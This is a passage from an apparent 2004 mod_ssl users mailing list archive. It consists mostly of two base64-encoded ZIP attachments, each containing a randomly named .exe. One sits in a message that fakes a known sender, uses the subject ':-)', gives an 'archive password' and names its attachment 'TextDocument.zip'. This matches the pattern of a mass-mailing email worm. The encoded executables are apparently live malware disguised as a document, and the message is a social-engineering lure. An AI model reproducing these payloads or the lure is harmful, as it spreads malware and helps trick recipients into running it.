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
SwUGAAAAAAEAAQA6AAAA6UcAAAAA

----------fxohsyhxpnumopammweb--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 01:55:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0BC22A8A6B; Tue,  2 Mar 2004 01:55:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Janu (CPE-24-94-195-230.mn.rr.com [24.94.195.230])
	by master.modssl.org (Postfix) with SMTP id 3301BA8971
	for ; Tue,  2 Mar 2004 01:55:34 +0100 (CET)
Date: Mon, 01 Mar 2004 18:55:31 -0600
To: modssl-users@modssl.org
Subject: :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------hylgdtiqdpvumsgdxlwy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------hylgdtiqdpvumsgdxlwy
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh, i don't like the plaintext  :)

23204 --  archive  password

----------hylgdtiqdpvumsgdxlwy
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

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
